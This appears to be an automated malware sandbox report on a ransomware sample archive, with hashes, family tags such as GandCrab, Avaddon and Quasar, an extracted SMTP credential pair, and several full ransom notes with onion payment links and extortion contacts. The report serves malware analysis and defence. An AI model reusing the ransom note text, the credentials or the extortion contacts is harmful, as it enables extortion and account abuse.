Overview

overview

10

Static

static

1

RNSM00384.7z

windows10-2004-x64

10

Analysis

  • max time kernel
    136s
  • max time network
    304s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03-11-2024 22:12

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    RNSM00384.7z

  • Size

    56.3MB

  • MD5

    600e405b3ca30e918aee2044111b6721

  • SHA1

    5855b3ced8b01d2177820f653a3ad7acd371dc22

  • SHA256

    a54e2aa0abb5b97d433a8e8fd2bdb2f83c9bef02e2db1695483a8294238adf46

  • SHA512

    08bcf977e46a624600662af6b580651a4e9927c9f47670e331531a58990f9440b593c7f5c280736d0cf222830439c796389d7eba0d76bbab12b2bdb3c9fec3ef

  • SSDEEP

    1572864:DwJV/DpTapvVBlk01AL78kFRdtEPoSx34382/oMR:gV/JaZRkga39SxO82AO

Score
10/10
avaddongandcrabgluptebaquasarxoristbackdoorcredential_accessdefense_evasiondiscoverydropperevasionexecutionimpactloaderpersistenceransomwarespywarestealerthemidatrojanupx

Malware Config

Extracted

Credentials

  • Protocol:     smtp
  • Host:
    smtp.gmail.com
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    212121QWER

Extracted

Family

quasar

Attributes
  • reconnect_delay

    3000

Extracted

Path

F:\$RECYCLE.BIN\S-1-5-21-1045960512-3948844814-3059691613-1000\HYEOAMLLU-MANUAL.txt

Family

gandcrab

Ransom Note
---= GANDCRAB V5.2 =--- ***********************UNDER NO CIRCUMSTANCES DO NOT DELETE THIS FILE, UNTIL ALL YOUR DATA IS RECOVERED*********************** *****FAILING TO DO SO, WILL RESULT IN YOUR SYSTEM CORRUPTION, IF THERE ARE DECRYPTION ERRORS***** Attention! All your files, documents, photos, databases and other important files are encrypted and have the extension: .HYEOAMLLU The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. The server with your key is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- | 0. Download Tor browser - https://www.torproject.org/ | 1. Install Tor browser | 2. Open Tor Browser | 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/9fca77e1278df339 | 4. Follow the instructions on this page ---------------------------------------------------------------------------------------- On our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. ATTENTION! IN ORDER TO PREVENT DATA DAMAGE: * DO NOT MODIFY ENCRYPTED FILES * DO NOT CHANGE DATA BELOW ---BEGIN GANDCRAB KEY--- lAQAAIeReO7GMSFr2isB8Bt/5+IDk/GmgkwZRbJgQHgTpeLw3aHunKH2vrgmE7l47gt4HegrOEKvljLtt2TYePg/IU7SJHZw1goCW4nvg5j1fbIV/GR5BQmKg1w8/kY9kREYudaUox3rKAfx+QRMxPqPX2QOxq2e0uQXLJhdGcxMMuwVQcc1tOUsqPh/mW9y6sj0J+CLnyC1C7HSkq95foHG3GofoH2ADdY5JiIBtOuzsZUd5K4a6G37JR6rknUdtMtoaikH5aB5GUulOpMK3WQvdXwEvO1TJLPlqBLXPwXcRxGrgFlj/Iow61hyO0622BpzR2wzQ7Y7685N5ADmfXh0mhU2nyvxrv6BYuWbzoqwAAZsh2MET5I934Ode+zgFYYNgD/SIrGKzLPfTr23+VXmCfPuQXVRKURUmn5baiYd/hg45XzAVSUsR+Yrd+wRvHxJk9QzX4AVAcAfcTixgunyiR7x2s/GHr74KujfRkLgZlR3hHZX5FHJyC02FBg2QTCZGt7oLvDK40Y7EhX9pRgOc0a9BQgzaPlYqLwd1CubBMiTdUEtKF/NkLmIFflQUM52DGqO0/HGhMwWxYwByrtIYsaIr0bZ8LZT7+2FmZEHPLlgIkhCR34xVn0/g1Kbb0k7Y2wBBViI+wJB3xZ/K7N0sfS1T+kuubBPDYIatyOFnu1+ATD6c55BK7IlkkxlxWJ//CdMLXFhyvRDlSJUx6RJEiX/aD9/YI2iITDP8UkdhJCBsVJ/yyKrj3lpw2Lb4wAIusCYC18LSR4gw4kbQOROF9lAbiyNwTLj9JRj5fBvfCgX0Np4JDf5mh8CecdrRlyv65UOaW9XBW+iL2kJ7tm9HIs8kBZytEuTWOLW79p3MEbcH+K+E4oWFaO4qiBYLFhDWZLntQRlRUk0CtPuVtMZbaIBSCnG5Je201aecc5sOaETm9Ix6bfdPk8e11XgpQfKt1hJ1EYOjCqApYQcG7cd/kw4VcqLIMQW4Bk106AysW8sf2P3+aSvQ/oLft76vrOIANeRPyZfMoen1w37phrbOnsqM6S2aCSBBfScaHd+UnwHcs5KNA9Wqz63r5Y69VcV9JFoNo2irTLtVv2C7U3/jKlq8t75iKAkrRHXMRFTXqNfsweZRBdCEqaNgZ4CWu2JHTB+n0tr3aZkIbaCHJXumdBH7UqC8Etqz6ZlH25I9EFcF5/vExjMsxV6WMcZOOr8yVhwzduQfg9zqUTeo7uiG6vUDRtKS78uY1mzI4TnpUFlUu3SZ3tEuXTVzE+Nm8ASZhLWtWgnHxmvJaBQYI55cvmNArnpaFRIdcE49KYkRZOTd9iq7X+3bFKzFdAlrHpMWv7sQJ+9wzGa9iZHWRkzbib/z0tNalU0T9xU3zWzfKXJY807uIpVTc0PRxa+mHXshkj24nDqzqt3Yiwj069f8nyhA+jfxeFEKLnpj3zFucKKmxrSg/k0td6Yfq0i2anDHTkWbDiBic9qyxx9/ZJwI76ScyQd+ZouYixDhEDTMQmH8NmP+PmZNY7feLtVBCCqiJp9mYrQkupkeeEyvHMUy334gwxOSLSgjzm04mp+KnGvT70POMhYSxzPEhm6zCJp6M5jF2X2SSxEocwQ4sLAwo6U27H4lDTgJTkVIQoAb9u49Nb38XUUF0eSEzMGAn5OnrvWtoNsMHOZMYV1P0mxDYnK6jH1OqPQz9YU/V3o0gVs+lrmT0GCHQqKlpxiAyYq/AZarNZcvBukmQWUWfa9ZAfBhvs4hOEcLB92Xe7EEurHLbIrJkAKO2+N3KzHSAkIvyCZ6KhfOJNdLc9GdclIL39DUlzkdFWM05uyXM+FAgyitfqZYGPtfwe6lz8iXO3HB1oUGD9REG8hfPKHTziQmW8YbBmmBQ83NShUNnvKAUVo1mYyQL06zhU5HOe0AVjZdeMnVavqdoJppeNsKU8SyYfqqhZ0YD/N6UMhBayJTNz9SX6RXOgLLcf6SVdGVKldeiGD1rPb04v0JGwPwKBHUrwJuNy7ivqFMzzIxxpCmuqH8n4tYu3s7OC2pw4jonos8J6D/wo1/Q9TwvGREw2KsK2tWRlX2FYp1CxepwKKXBdUKtx6rgjsTAGqKjqk9L0puEI6hKKb9VRVAjMD6vRfqkABdi2ajak9eakfWzziL4S9W/UiFVC6mJHuny3TRRIUblbkUKfclkTPlkcBdDSvURfN1SNimQniI/CjFKB+2J5WrEAf9gjc5tCNrwrqDtYwkMzGr1c= ---END GANDCRAB KEY--- ---BEGIN PC DATA--- 7ftDEgLb/ZS0lcmZbHM61KDJ6AOtD78KkA7absMgUXYxWLsC+5+UYF9xVmD59MnJMZDWAuqVqeDGRW7IKnQXQzua3LPyzokSUuglaqKXwabsGM4pXku5In6gtMQMqg7sgEh1XW1iPMFgiUj/s1LdWpJHdiPjMpn7rCZNO/A31mak0K8RefoREu3BxtlAsseHWfVIIKN0U4NnA3w0Ga7XDLlF3iOIB6ImYbF6Z/7MBN2mgBr2rZ2gU1R7jNx2WKAyu4W+5zlHFnKwMISBi1CwemOo6FrxnP+Z5F9bSR7OvDBsmLj7oYD6GBgpBqj3RSAVfvfE0yZSXyCRtLeJdNBbBndq/8Y5R+e3ZLHNmdaRi0eIP43yqvNmLLfjUKP0r1BW4eYoT03JrPa/L0B0wffnS0ez96BFoTHFq52HPDCx6yhEudvoPVoM6iaVy+mvqAdvYbwBrtoyqy8P1filXDmT7q54D+w6gTmwK0yub5gfz9wpLQCj3bimwDPi8jPeKPiggI2bWKz+7QkWvC2ihYFfEuZEsyM4ANvhxNQXIE31UkGbyfSMBJ0C1n0/geR7exoErHT3CuHratdMPE+VL8ogLqkb9gmccDCV+LDFEc+sELTbnImaZUIrb4k0v1Gdc2TS06JZDEbFhoHmqBlwika+xMnGu3VDm7fKZfNiEp2dQJi5zlJfAroB7wU2qF+PdDh8q5K7QFljuV0oysnw41zSuvhBPw5/yUtuYcYrGEds ---END PC DATA---
URLs

http://gandcrabmfe6mnef.onion/9fca77e1278df339

Extracted

Path

C:\Users\Admin\Desktop\00384\Setting\tvov5Gi3_readme.txt

Family

avaddon

Ransom Note
-------=== Your network has been infected! ===------- ***************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED ***************** All your documents, photos, databases and other important files have been encrypted and have the extension: .aAbDBDaCcc You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files! The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files! You can get more information on our page, which is located in a Tor hidden network. How to get to our page -------------------------------------------------------------------------------- | | 1. Download Tor browser - https://www.torproject.org/ | | 2. Install Tor browser | | 3. Open link in Tor browser - avaddonbotrxmuyl.onion | | 4. Follow the instructions on this page | -------------------------------------------------------------------------------- Your ID: -------------------------------------------------------------------------------- Mzc3LVA5Y05OZEVQRW9IU014bmFEYkRYMlJSeStKTzRqcnFQRWUxVEsvUjA3RmFyZExLN2hpM1Bhb3g5MUV4THBuWTAyTVBsWlJhTEY0ZFE0ODhvclhPWXU2TytPdG1hV3lCU0djQjJDeERzV2ppQm1XM0V1WGVhN0dCa0JmT01xRGJBU2xGRFNybi9CRVJIa1pCektTSjk3LzZCdEFReEMvZkxOcDZxNHY2TjFSWSswOFRKeWg3dE15TSsvc1JFRitVQUZWclU1KzJtb1A2Q0JoWnFia2k0bUs0MUwwSEgyZEdqV3k4bUZVRm16bnJVT2tWVllNYzdEUFhqc1plOXhZQmlCeDhsYzNzdUh6ekVqWmVLSzIyamJsN3hOLzF6aHVobTY5Z0hscmZZVG95SDIwMlRiM1BIektjQlNUMG8xa0l0emU1SkhMMi9KUWdDL0x5UW1pYm9KS01EODlmaDJPQlUxVm5BZHd3T1ZZMUVsMHhmbkxxQVA4L1pKNldNbEJRdUJINEU0bmdkVXVaM1NjbE1iTHUrQUovZ3AxUWs2S0VUREJMcTZ0c2R0NU02WC82RWRBdkFNVlNXenRxNFlKVnExYlNXeEpDdEdxOVlaR251ZWRrODlpaDd6MUQxNFRaTEVpb0g1dXNGMWJ1U2lkVG9PWmhhTDUrcDY0K2wxL09DQnVjOUZEdUtkbXpzWE5Hb0NROE56bTdSVWRrLytNOFJtd2szTlVUK2RSZUZ6cE0wR1BFUWNETkpTNHlPN0tzNWZaUUhQWTB5cllnYWkrU3ZEL0pucFU1bVFIaUt5SG5vUllxNS8vTHF4dFdMQlZuT3dHRVB1R2l5MXozVmxURVN5SEF3ZSt4ZWQzTUFVbldRZW52Vko2c3BXL2MvWktHMFdVaHNBTTM2dmJ0WVRDZHZzcUNtSTg1RzN4OEErTXFvaW1FQUxURERoZmFmVmpHclYxYmI0bjdMNVQ3U0tMSVc0T1RleGU4Ni9rSUtrdXVKcUlCYW1MSWlvNWNvSGFQZjhQaGxHdUJBTyt0SlBLRFdscFlTMTV1eEszekdyQWg1a29rWkhkanE3SkZWWG5IUFFrWDUvSm1MbHAzRndXTEkyM25CbGxhdjgwWTdzWjk5QS9LY1V3Qm5LaEtQanY4TjdLM1ZVeURMNDdkZ0d3eDF1MTNXLzlLcnRuSTV3VUQ2dTNYQUFmZFZIQXErZUVMcHc3TVRwcmZEKzE1S044NXh6d3BYbkNFa3JiM056dzFLSm1ndE9ZQk9UU2hza0dFK0NwOHhpWjh1WmFUT2s0NkJ0S3d5MXlkOXFodGt2Y2dIY0RVOXV4amFEdHJDeFh5b1dmVWpmYUdYS2E1eER3M3JuSytzeldEZi90c1pOWWlJQktLS0lTaFhaNlp3V0dMcHFXRDc1KzJjQngzaERGQXUzWWVMUUxoL3JVa2MxQXBVT1Z4MElsSXlQOWNFRVBzTzhtRzBxRTVkNHJhMU9McCtpSEJPNWhDVHhVWWp0ZlNjL2xFbGp1UWhoYlJiQWFsVWVXTmFSQ013UTlid1JuVWRkVC9pSExGZWtSNjNGSUMwa3cyMGFFeGQybzBrZXhtV3RmNjV0K3dJdmFUdU9vNmtPLzBYb21FbjhQTjFnNlgvT21DYTNyUEp3MWF0R2UyQU5Dd0xMSTNYTXdoU25GT1pHUVd5WWZQU3RBeDhHY25hL3BhVklPZFlSWkZvOS9INURvaUJKdGJvcnlOZ2dESU1LZk5CRVZxczAvOWpuUGsveDRRV01pUDE4cG1wdkF5MEJhbC9ORCtyd2twVnpYQXFEUEl1VXUrd2NEVDJnS21xZGQzTld5UUs4ekVFaEpsUmwxSFB2R1pSMW1RUkphNTYra2NSYngrcVhxelN4SDhGUUMvZXJZejhNRXpMRUp1TFJqL1l5cENYYkRUNkx3UEQyYzl4bGxOVEd5T29OWHZTVkVDbVYwUml5MkJVQU0ra3hPVXVlRmJZTWdELzRmYWYrR3luTVoyWnVmN1Q2RmgxM1J3ZFpCcldqMi9TNDB0UVlucXo1d3o3UEgrTFdSNGtORVVWL1YrY2JjOFBFcmd5SXBybThmd1ZFOWM4bHorcjEyNHQ2VktPVDhnMHg0TWJ4cjZNMjZqUlhEaERyQW10SmRlaVV2L2V5V1pLSXh6T3NzOWU1NjNIUG5sSHkxQmljUUdmanFxeXhVVHFsS2dm -------------------------------------------------------------------------------- * DO NOT TRY TO RECOVER FILES YOURSELF! * DO NOT MODIFY ENCRYPTED FILES! * * * OTHERWISE, YOU MAY LOSE ALL YOUR FILES FOREVER! * * * ec4GEwhY8XRq2EgcvZGKvDUv99CEs
URLs

http://avaddonbotrxmuyl.onion

Extracted

Path

C:\Users\Admin\Desktop\tvov5Gi3_readme.txt

Family

avaddon

Ransom Note
-------=== Your network has been infected! ===------- ***************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED ***************** All your documents, photos, databases and other important files have been encrypted and have the extension: .aAbDBDaCcc You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files! The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files! You can get more information on our page, which is located in a Tor hidden network. How to get to our page -------------------------------------------------------------------------------- | | 1. Download Tor browser - https://www.torproject.org/ | | 2. Install Tor browser | | 3. Open link in Tor browser - avaddonbotrxmuyl.onion | | 4. Follow the instructions on this page | -------------------------------------------------------------------------------- Your ID: -------------------------------------------------------------------------------- Mzc3LVA5Y05OZEVQRW9IU014bmFEYkRYMlJSeStKTzRqcnFQRWUxVEsvUjA3RmFyZExLN2hpM1Bhb3g5MUV4THBuWTAyTVBsWlJhTEY0ZFE0ODhvclhPWXU2TytPdG1hV3lCU0djQjJDeERzV2ppQm1XM0V1WGVhN0dCa0JmT01xRGJBU2xGRFNybi9CRVJIa1pCektTSjk3LzZCdEFReEMvZkxOcDZxNHY2TjFSWSswOFRKeWg3dE15TSsvc1JFRitVQUZWclU1KzJtb1A2Q0JoWnFia2k0bUs0MUwwSEgyZEdqV3k4bUZVRm16bnJVT2tWVllNYzdEUFhqc1plOXhZQmlCeDhsYzNzdUh6ekVqWmVLSzIyamJsN3hOLzF6aHVobTY5Z0hscmZZVG95SDIwMlRiM1BIektjQlNUMG8xa0l0emU1SkhMMi9KUWdDL0x5UW1pYm9KS01EODlmaDJPQlUxVm5BZHd3T1ZZMUVsMHhmbkxxQVA4L1pKNldNbEJRdUJINEU0bmdkVXVaM1NjbE1iTHUrQUovZ3AxUWs2S0VUREJMcTZ0c2R0NU02WC82RWRBdkFNVlNXenRxNFlKVnExYlNXeEpDdEdxOVlaR251ZWRrODlpaDd6MUQxNFRaTEVpb0g1dXNGMWJ1U2lkVG9PWmhhTDUrcDY0K2wxL09DQnVjOUZEdUtkbXpzWE5Hb0NROE56bTdSVWRrLytNOFJtd2szTlVUK2RSZUZ6cE0wR1BFUWNETkpTNHlPN0tzNWZaUUhQWTB5cllnYWkrU3ZEL0pucFU1bVFIaUt5SG5vUllxNS8vTHF4dFdMQlZuT3dHRVB1R2l5MXozVmxURVN5SEF3ZSt4ZWQzTUFVbldRZW52Vko2c3BXL2MvWktHMFdVaHNBTTM2dmJ0WVRDZHZzcUNtSTg1RzN4OEErTXFvaW1FQUxURERoZmFmVmpHclYxYmI0bjdMNVQ3U0tMSVc0T1RleGU4Ni9rSUtrdXVKcUlCYW1MSWlvNWNvSGFQZjhQaGxHdUJBTyt0SlBLRFdscFlTMTV1eEszekdyQWg1a29rWkhkanE3SkZWWG5IUFFrWDUvSm1MbHAzRndXTEkyM25CbGxhdjgwWTdzWjk5QS9LY1V3Qm5LaEtQanY4TjdLM1ZVeURMNDdkZ0d3eDF1MTNXLzlLcnRuSTV3VUQ2dTNYQUFmZFZIQXErZUVMcHc3TVRwcmZEKzE1S044NXh6d3BYbkNFa3JiM056dzFLSm1ndE9ZQk9UU2hza0dFK0NwOHhpWjh1WmFUT2s0NkJ0S3d5MXlkOXFodGt2Y2dIY0RVOXV4amFEdHJDeFh5b1dmVWpmYUdYS2E1eER3M3JuSytzeldEZi90c1pOWWlJQktLS0lTaFhaNlp3V0dMcHFXRDc1KzJjQngzaERGQXUzWWVMUUxoL3JVa2MxQXBVT1Z4MElsSXlQOWNFRVBzTzhtRzBxRTVkNHJhMU9McCtpSEJPNWhDVHhVWWp0ZlNjL2xFbGp1UWhoYlJiQWFsVWVXTmFSQ013UTlid1JuVWRkVC9pSExGZWtSNjNGSUMwa3cyMGFFeGQybzBrZXhtV3RmNjV0K3dJdmFUdU9vNmtPLzBYb21FbjhQTjFnNlgvT21DYTNyUEp3MWF0R2UyQU5Dd0xMSTNYTXdoU25GT1pHUVd5WWZQU3RBeDhHY25hL3BhVklPZFlSWkZvOS9INURvaUJKdGJvcnlOZ2dESU1LZk5CRVZxczAvOWpuUGsveDRRV01pUDE4cG1wdkF5MEJhbC9ORCtyd2twVnpYQXFEUEl1VXUrd2NEVDJnS21xZGQzTld5UUs4ekVFaEpsUmwxSFB2R1pSMW1RUkphNTYra2NSYngrcVhxelN4SDhGUUMvZXJZejhNRXpMRUp1TFJqL1l5cENYYkRUNkx3UEQyYzl4bGxOVEd5T29OWHZTVkVDbVYwUml5MkJVQU0ra3hPVXVlRmJZTWdELzRmYWYrR3luTVoyWnVmN1Q2RmgxM1J3ZFpCcldqMi9TNDB0UVlucXo1d3o3UEgrTFdSNGtORVVWL1YrY2JjOFBFcmd5SXBybThmd1ZFOWM4bHorcjEyNHQ2VktPVDhnMHg0TWJ4cjZNMjZqUlhEaERyQW10SmRlaVV2L2V5V1pLSXh6T3NzOWU1NjNIUG5sSHkxQmljUUdmanFxeXhVVHFsS2dm -------------------------------------------------------------------------------- * DO NOT TRY TO RECOVER FILES YOURSELF! * DO NOT MODIFY ENCRYPTED FILES! * * * OTHERWISE, YOU MAY LOSE ALL YOUR FILES FOREVER! * * * DUOqEX3
URLs

http://avaddonbotrxmuyl.onion

Extracted

Path

\Device\HarddiskVolume1\Boot\cs-CZ\HOW TO DECRYPT FILES.txt

Ransom Note
ATTENTION! Don't worry my friend, you can return all your files! All your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-2jkyb95pOj Price of private key and decrypt software is $500. Discount 50% available if you contact us first 72 hours, that's price for you is $130. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Our Telegram account: @restorefile Your Type Encrypt : asulo
URLs

https://we.tl/t-2jkyb95pOj

Extracted

Path

C:\Users\Admin\Desktop\tvov5Gi3_readme.txt

Family

avaddon

Ransom Note
-------=== Your network has been infected! ===------- ***************** DO NOT DELETE THIS FILE UNTIL ALL YOUR DATA HAVE BEEN RECOVERED ***************** All your documents, photos, databases and other important files have been encrypted and have the extension: .aAbDBDaCcc You are not able to decrypt it by yourself. But don't worry, we can help you to restore all your files! The only way to restore your files is to buy our special software. Only we can give you this software and only we can restore your files! You can get more information on our page, which is located in a Tor hidden network. How to get to our page -------------------------------------------------------------------------------- | | 1. Download Tor browser - https://www.torproject.org/ | | 2. Install Tor browser | | 3. Open link in Tor browser - avaddonbotrxmuyl.onion | | 4. Follow the instructions on this page | -------------------------------------------------------------------------------- Your ID: -------------------------------------------------------------------------------- Mzc3LVA5Y05OZEVQRW9IU014bmFEYkRYMlJSeStKTzRqcnFQRWUxVEsvUjA3RmFyZExLN2hpM1Bhb3g5MUV4THBuWTAyTVBsWlJhTEY0ZFE0ODhvclhPWXU2TytPdG1hV3lCU0djQjJDeERzV2ppQm1XM0V1WGVhN0dCa0JmT01xRGJBU2xGRFNybi9CRVJIa1pCektTSjk3LzZCdEFReEMvZkxOcDZxNHY2TjFSWSswOFRKeWg3dE15TSsvc1JFRitVQUZWclU1KzJtb1A2Q0JoWnFia2k0bUs0MUwwSEgyZEdqV3k4bUZVRm16bnJVT2tWVllNYzdEUFhqc1plOXhZQmlCeDhsYzNzdUh6ekVqWmVLSzIyamJsN3hOLzF6aHVobTY5Z0hscmZZVG95SDIwMlRiM1BIektjQlNUMG8xa0l0emU1SkhMMi9KUWdDL0x5UW1pYm9KS01EODlmaDJPQlUxVm5BZHd3T1ZZMUVsMHhmbkxxQVA4L1pKNldNbEJRdUJINEU0bmdkVXVaM1NjbE1iTHUrQUovZ3AxUWs2S0VUREJMcTZ0c2R0NU02WC82RWRBdkFNVlNXenRxNFlKVnExYlNXeEpDdEdxOVlaR251ZWRrODlpaDd6MUQxNFRaTEVpb0g1dXNGMWJ1U2lkVG9PWmhhTDUrcDY0K2wxL09DQnVjOUZEdUtkbXpzWE5Hb0NROE56bTdSVWRrLytNOFJtd2szTlVUK2RSZUZ6cE0wR1BFUWNETkpTNHlPN0tzNWZaUUhQWTB5cllnYWkrU3ZEL0pucFU1bVFIaUt5SG5vUllxNS8vTHF4dFdMQlZuT3dHRVB1R2l5MXozVmxURVN5SEF3ZSt4ZWQzTUFVbldRZW52Vko2c3BXL2MvWktHMFdVaHNBTTM2dmJ0WVRDZHZzcUNtSTg1RzN4OEErTXFvaW1FQUxURERoZmFmVmpHclYxYmI0bjdMNVQ3U0tMSVc0T1RleGU4Ni9rSUtrdXVKcUlCYW1MSWlvNWNvSGFQZjhQaGxHdUJBTyt0SlBLRFdscFlTMTV1eEszekdyQWg1a29rWkhkanE3SkZWWG5IUFFrWDUvSm1MbHAzRndXTEkyM25CbGxhdjgwWTdzWjk5QS9LY1V3Qm5LaEtQanY4TjdLM1ZVeURMNDdkZ0d3eDF1MTNXLzlLcnRuSTV3VUQ2dTNYQUFmZFZIQXErZUVMcHc3TVRwcmZEKzE1S044NXh6d3BYbkNFa3JiM056dzFLSm1ndE9ZQk9UU2hza0dFK0NwOHhpWjh1WmFUT2s0NkJ0S3d5MXlkOXFodGt2Y2dIY0RVOXV4amFEdHJDeFh5b1dmVWpmYUdYS2E1eER3M3JuSytzeldEZi90c1pOWWlJQktLS0lTaFhaNlp3V0dMcHFXRDc1KzJjQngzaERGQXUzWWVMUUxoL3JVa2MxQXBVT1Z4MElsSXlQOWNFRVBzTzhtRzBxRTVkNHJhMU9McCtpSEJPNWhDVHhVWWp0ZlNjL2xFbGp1UWhoYlJiQWFsVWVXTmFSQ013UTlid1JuVWRkVC9pSExGZWtSNjNGSUMwa3cyMGFFeGQybzBrZXhtV3RmNjV0K3dJdmFUdU9vNmtPLzBYb21FbjhQTjFnNlgvT21DYTNyUEp3MWF0R2UyQU5Dd0xMSTNYTXdoU25GT1pHUVd5WWZQU3RBeDhHY25hL3BhVklPZFlSWkZvOS9INURvaUJKdGJvcnlOZ2dESU1LZk5CRVZxczAvOWpuUGsveDRRV01pUDE4cG1wdkF5MEJhbC9ORCtyd2twVnpYQXFEUEl1VXUrd2NEVDJnS21xZGQzTld5UUs4ekVFaEpsUmwxSFB2R1pSMW1RUkphNTYra2NSYngrcVhxelN4SDhGUUMvZXJZejhNRXpMRUp1TFJqL1l5cENYYkRUNkx3UEQyYzl4bGxOVEd5T29OWHZTVkVDbVYwUml5MkJVQU0ra3hPVXVlRmJZTWdELzRmYWYrR3luTVoyWnVmN1Q2RmgxM1J3ZFpCcldqMi9TNDB0UVlucXo1d3o3UEgrTFdSNGtORVVWL1YrY2JjOFBFcmd5SXBybThmd1ZFOWM4bHorcjEyNHQ2VktPVDhnMHg0TWJ4cjZNMjZqUlhEaERyQW10SmRlaVV2L2V5V1pLSXh6T3NzOWU1NjNIUG5sSHkxQmljUUdmanFxeXhVVHFsS2dm -------------------------------------------------------------------------------- * DO NOT TRY TO RECOVER FILES YOURSELF! * DO NOT MODIFY ENCRYPTED FILES! * * * OTHERWISE, YOU MAY LOSE ALL YOUR FILES FOREVER! * * * Z60C3jpm0z
URLs

http://avaddonbotrxmuyl.onion

Extracted

Path

F:\$RECYCLE.BIN\KRAB-DECRYPT.txt

Ransom Note
---= GANDCRAB V4 =--- Attention! All your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. The server with your key is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- | 0. Download Tor browser - https://www.torproject.org/ | 1. Install Tor browser | 2. Open Tor Browser | 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/9fca77e1278df339 | 4. Follow the instructions on this page ---------------------------------------------------------------------------------------- On our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. ATTENTION! IN ORDER TO PREVENT DATA DAMAGE: * DO NOT MODIFY ENCRYPTED FILES * DO NOT CHANGE DATA BELOW ---BEGIN GANDCRAB KEY--- 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